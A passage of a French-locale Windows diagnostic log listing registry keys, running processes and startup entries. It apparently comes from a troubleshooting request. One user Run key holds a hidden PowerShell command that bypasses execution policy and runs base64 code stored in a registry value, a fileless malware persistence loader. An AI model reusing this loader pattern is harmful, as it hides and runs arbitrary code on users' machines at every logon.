        ProcessGroupPolicy    REG_SZ    ProcessConnectivityPlatformPolicy
        DllName    REG_EXPAND_SZ    gptext.dll
        NoUserPolicy    REG_DWORD    0x1
        NoGPOListChanges    REG_DWORD    0x1
        RequiresSuccessfulRegistry    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
        LogMeInRemoteUser    REG_DWORD    0x0
        postgres    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked
    
    "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ===> Not found
    "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ===> Not found
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DllNXOptions
        mscoree.dll    REG_DWORD    0x1
        mscorwks.dll    REG_DWORD    0x1
        mso.dll    REG_DWORD    0x1
        msjava.dll    REG_DWORD    0x1
        msci_uno.dll    REG_DWORD    0x1
        jvm.dll    REG_DWORD    0x1
        jvm_g.dll    REG_DWORD    0x1
        javai.dll    REG_DWORD    0x1
        vb40032.dll    REG_DWORD    0x1
        vbe6.dll    REG_DWORD    0x1
        ums.dll    REG_DWORD    0x1
        main123w.dll    REG_DWORD    0x1
        udtapi.dll    REG_DWORD    0x1
        mscorsvr.dll    REG_DWORD    0x1
        eMigrationmmc.dll    REG_DWORD    0x1
        eProcedureMMC.dll    REG_DWORD    0x1
        eQueryMMC.dll    REG_DWORD    0x1
        EncryptPatchVer.dll    REG_DWORD    0x1
        Cleanup.dll    REG_DWORD    0x1
        divx.dll    REG_DWORD    0x1
        divxdec.ax    REG_DWORD    0x1
        fullsoft.dll    REG_DWORD    0x1
        NSWSTE.dll    REG_DWORD    0x1
        ASSTE.dll    REG_DWORD    0x1
        NPMLIC.dll    REG_DWORD    0x1
        PMSTE.dll    REG_DWORD    0x1
        AVSTE.dll    REG_DWORD    0x1
        NAVOPTRF.dll    REG_DWORD    0x1
        DRMINST.dll    REG_DWORD    0x1
        TFDTCTT8.dll    REG_DWORD    0x1
        DJSMAR00.dll    REG_DWORD    0x1
        xlmlEN.dll    REG_DWORD    0x1
        ISSTE.dll    REG_DWORD    0x1
        symlcnet.dll    REG_DWORD    0x1
        ppw32hlp.dll    REG_DWORD    0x1
        Apitrap.dll    REG_DWORD    0x1
        Vegas60k.dll    REG_DWORD    0x1
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DropboxUpdate.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ExtExport.exe
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashPlayerApp.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashPlayerPlugin_19_0_0_185.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashPlayerUpdateService.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_14_0_0_145_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_15_0_0_152_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_15_0_0_223_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_15_0_0_239_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_15_0_0_246_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_19_0_0_185_ActiveX.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil32_19_0_0_185_Plugin.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil64_14_0_0_145_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil64_15_0_0_152_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil64_15_0_0_223_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil64_15_0_0_239_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil64_15_0_0_246_pepper.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil64_19_0_0_185_ActiveX.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FlashUtil64_19_0_0_185_Plugin.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ie4uinit.exe
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieinstal.exe
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ielowutil.exe
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ieUnatt.exe
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
        DisableUserModeCallbackFilter    REG_DWORD    0x1
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MovieMaker.exe
        CWDIllegalInDllSearch    REG_DWORD    0xffffffff
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msfeedssync.exe
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe
        DisableExceptionChainValidation    REG_DWORD    0x0
        MitigationOptions    REG_QWORD    0x100
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WLXAlbumDownloadWizard.exe
        CWDIllegalInDllSearch    REG_DWORD    0xffffffff
    
    
    ******************************************************************************
    "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
    
    ******************************************************************************
    
    
    Nom de l'image:      System Idle Process
    PID:                 0
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 24 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    40:47:21
    Titre de la fenêtre: N/A
    
    Nom de l'image:      System
    PID:                 4
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 5 112 Ko
    État:                Unknown
    Nom d'utilisateur:   N/A
    Temps processeur:    0:01:41
    Titre de la fenêtre: N/A
    
    Nom de l'image:      smss.exe
    PID:                 360
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 1 628 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      csrss.exe
    PID:                 476
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 5 240 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:03
    Titre de la fenêtre: N/A
    
    Nom de l'image:      wininit.exe
    PID:                 592
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 5 604 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      csrss.exe
    PID:                 600
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 11 256 Ko
    État:                Running
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:06
    Titre de la fenêtre: N/A
    
    Nom de l'image:      services.exe
    PID:                 648
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 11 448 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:09
    Titre de la fenêtre: N/A
    
    Nom de l'image:      winlogon.exe
    PID:                 684
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 9 616 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      lsass.exe
    PID:                 696
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 14 944 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:05
    Titre de la fenêtre: N/A
    
    Nom de l'image:      lsm.exe
    PID:                 704
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 5 388 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 812
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 12 452 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:07
    Titre de la fenêtre: N/A
    
    Nom de l'image:      nvvsvc.exe
    PID:                 872
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 9 416 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 912
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 10 600 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE RÉSEAU
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      MsMpEng.exe
    PID:                 984
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 132 712 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:01:35
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 384
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 21 204 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE LOCAL
    Temps processeur:    0:00:01
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 376
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 20 676 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 484
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 30 080 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE LOCAL
    Temps processeur:    0:00:01
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 528
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 48 952 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:09
    Titre de la fenêtre: N/A
    
    Nom de l'image:      CTAudSvc.exe
    PID:                 1052
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 4 832 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 1092
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 8 456 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 1304
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 20 656 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE RÉSEAU
    Temps processeur:    0:00:06
    Titre de la fenêtre: N/A
    
    Nom de l'image:      NvXDSync.exe
    PID:                 1448
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 24 112 Ko
    État:                Running
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: UxdService
    
    Nom de l'image:      nvvsvc.exe
    PID:                 1456
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 16 144 Ko
    État:                Running
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: NvSvc
    
    Nom de l'image:      spoolsv.exe
    PID:                 1580
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 14 024 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      armsvc.exe
    PID:                 1044
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 4 272 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 1292
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 14 848 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 496
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 8 604 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE LOCAL
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 1696
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 11 052 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE LOCAL
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 2060
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 7 372 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE LOCAL
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      vmnat.exe
    PID:                 2124
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 5 136 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      WLIDSVC.EXE
    PID:                 2228
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 18 740 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      vmware-authd.exe
    PID:                 2296
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 10 752 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:01
    Titre de la fenêtre: N/A
    
    Nom de l'image:      WLIDSVCM.EXE
    PID:                 2316
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 4 800 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      vmnetdhcp.exe
    PID:                 2372
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 10 924 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      vmware-usbarbitrator64.exe
    PID:                 2392
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 9 524 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      svchost.exe
    PID:                 2916
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 9 836 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE LOCAL
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      TrustedInstaller.exe
    PID:                 2512
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 16 668 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:24
    Titre de la fenêtre: N/A
    
    Nom de l'image:      WmiPrvSE.exe
    PID:                 2644
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 8 184 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\Système
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      taskhost.exe
    PID:                 2924
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 33 984 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:03
    Titre de la fenêtre: MCI command handling window
    
    Nom de l'image:      dwm.exe
    PID:                 2888
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 37 824 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:01:38
    Titre de la fenêtre: DWM Notification Window
    
    Nom de l'image:      explorer.exe
    PID:                 1068
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 58 084 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:24
    Titre de la fenêtre: N/A
    
    Nom de l'image:      msseces.exe
    PID:                 2540
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 16 472 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:00
    Titre de la fenêtre: Microsoft Security Essentials
    
    Nom de l'image:      Ctxfihlp.exe
    PID:                 3404
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 9 984 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:00
    Titre de la fenêtre: CTxfiHlp
    
    Nom de l'image:      CTxfispi.exe
    PID:                 3576
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 11 568 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      TurboLaunch.exe
    PID:                 3908
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 16 920 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:00
    Titre de la fenêtre: TurboLaunch
    
    Nom de l'image:      seamonkey.exe
    PID:                 2608
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 512 744 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:20:32
    Titre de la fenêtre: 26% of 1 file - Download Manager
    
    Nom de l'image:      OSPPSVC.EXE
    PID:                 1260
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 12 972 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE RÉSEAU
    Temps processeur:    0:00:03
    Titre de la fenêtre: N/A
    
    Nom de l'image:      audiodg.exe
    PID:                 2192
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 22 164 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE LOCAL
    Temps processeur:    0:00:29
    Titre de la fenêtre: N/A
    
    Nom de l'image:      cmd.exe
    PID:                 4300
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 8 820 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:00
    Titre de la fenêtre: Administrateur :  Check Startup Registry Keys and Process List by Hackoo 2016
    
    Nom de l'image:      conhost.exe
    PID:                 2576
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 6 848 Ko
    État:                Running
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:00
    Titre de la fenêtre: CicMarshalWnd
    
    Nom de l'image:      tasklist.exe
    PID:                 1344
    Nom de la session:   Console
    Numéro de session:   1
    Utilisation mémoire: 7 728 Ko
    État:                Unknown
    Nom d'utilisateur:   mike\michael
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    Nom de l'image:      WmiPrvSE.exe
    PID:                 3572
    Nom de la session:   Services
    Numéro de session:   0
    Utilisation mémoire: 7 720 Ko
    État:                Unknown
    Nom d'utilisateur:   AUTORITE NT\SERVICE RÉSEAU
    Temps processeur:    0:00:00
    Titre de la fenêtre: N/A
    
    ******************************************************************************
    ******************************************************************************
                                 STARTUP List
    ******************************************************************************
    
    
    Caption=CtxfiReg
    Command=CTXFIREG.exe /FAIL1
    Description=CtxfiReg
    Location=HKU\S-1-5-18\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=CtxfiReg
    SettingID=
    User=AUTORITE NT\SystÞme
    UserSID=S-1-5-18
    
    
    Caption=Sidebar
    Command=%ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
    Description=Sidebar
    Location=HKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=Sidebar
    SettingID=
    User=AUTORITE NT\SERVICE LOCAL
    UserSID=S-1-5-19
    
    
    Caption=Sidebar
    Command=%ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
    Description=Sidebar
    Location=HKU\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=Sidebar
    SettingID=
    User=AUTORITE NT\SERVICE R╔SEAU
    UserSID=S-1-5-20
    
    
    Caption=Last.fm Scrobbler
    Command=Last.fm Scrobbler.lnk
    Description=Last.fm Scrobbler
    Location=Startup
    Name=Last.fm Scrobbler
    SettingID=
    User=mike\michael
    UserSID=S-1-5-21-4027148100-3405918830-622884426-1000
    
    
    Caption=TurboLaunch
    Command=TurboLaunch.lnk
    Description=TurboLaunch
    Location=Startup
    Name=TurboLaunch
    SettingID=
    User=mike\michael
    UserSID=S-1-5-21-4027148100-3405918830-622884426-1000
    
    
    Caption=GmailNotifierPro
    Command=C:\Program Files (x86)\Gmail Notifier Pro\GmailNotifierPro.exe /minimized
    Description=GmailNotifierPro
    Location=HKU\S-1-5-21-4027148100-3405918830-622884426-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=GmailNotifierPro
    SettingID=
    User=mike\michael
    UserSID=S-1-5-21-4027148100-3405918830-622884426-1000
    
    
    Caption=AdobeBridge
    Command=
    Description=AdobeBridge
    Location=HKU\S-1-5-21-4027148100-3405918830-622884426-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=AdobeBridge
    SettingID=
    User=mike\michael
    UserSID=S-1-5-21-4027148100-3405918830-622884426-1000
    
    
    Caption=MusicManager
    Command="C:\Users\michael\AppData\Local\Programs\Google\MusicManager\MusicManager.exe"
    Description=MusicManager
    Location=HKU\S-1-5-21-4027148100-3405918830-622884426-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=MusicManager
    SettingID=
    User=mike\michael
    UserSID=S-1-5-21-4027148100-3405918830-622884426-1000
    
    
    Caption=ACDSeeCommanderPro8
    Command=C:\Program Files\ACD Systems\ACDSee Pro\8.0\ACDSeeCommanderPro8.exe
    Description=ACDSeeCommanderPro8
    Location=HKU\S-1-5-21-4027148100-3405918830-622884426-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=ACDSeeCommanderPro8
    SettingID=
    User=mike\michael
    UserSID=S-1-5-21-4027148100-3405918830-622884426-1000
    
    
    Caption=Google Update
    Command="C:\Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe" /c
    Description=Google Update
    Location=HKU\S-1-5-21-4027148100-3405918830-622884426-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=Google Update
    SettingID=
    User=mike\michael
    UserSID=S-1-5-21-4027148100-3405918830-622884426-1000
    
    
    Caption={BE9473EA-5660-4BF7-91C3-2A2258213EE1}
    Command=C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));
    Description={BE9473EA-5660-4BF7-91C3-2A2258213EE1}
    Location=HKU\S-1-5-21-4027148100-3405918830-622884426-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name={BE9473EA-5660-4BF7-91C3-2A2258213EE1}
    SettingID=
    User=mike\michael
    UserSID=S-1-5-21-4027148100-3405918830-622884426-1000
    
    
    Caption=CtxfiReg
    Command=CTXFIREG.exe /FAIL1
    Description=CtxfiReg
    Location=HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=CtxfiReg
    SettingID=
    User=.DEFAULT
    UserSID=
    
    
    Caption=MSC
    Command="C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
    Description=MSC
    Location=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    Name=MSC
    SettingID=
    User=Public
    UserSID=
    
    
    
    
    ******************************************************************************
                                  Process List
    ******************************************************************************
    
    
    ProcessID      : 0
    ProcessName    : System Idle Process
    Handle         : 0
    commandline    : 
    ExecutablePath : 
    
    ProcessID      : 4
    ProcessName    : System
    Handle         : 4
    commandline    : 
    ExecutablePath : 
    
    ProcessID      : 360
    ProcessName    : smss.exe
    Handle         : 360
    commandline    : \SystemRoot\System32\smss.exe
    ExecutablePath : 
    
    ProcessID      : 476
    ProcessName    : csrss.exe
    Handle         : 476
    commandline    : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Win
                     dows SharedSection=1024,20480,768 Windows=On SubSyst
                     emType=Windows ServerDll=basesrv,1 ServerDll=winsrv:
                     UserServerDllInitialization,3 ServerDll=winsrv:ConSe
                     rverDllInitialization,2 ServerDll=sxssrv,4 ProfileCo
                     ntrol=Off MaxRequestThreads=16
    ExecutablePath : C:\Windows\system32\csrss.exe
    
    ProcessID      : 592
    ProcessName    : wininit.exe
    Handle         : 592
    commandline    : wininit.exe
    ExecutablePath : C:\Windows\system32\wininit.exe
    
    ProcessID      : 600
    ProcessName    : csrss.exe
    Handle         : 600
    commandline    : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Win
                     dows SharedSection=1024,20480,768 Windows=On SubSyst
                     emType=Windows ServerDll=basesrv,1 ServerDll=winsrv:
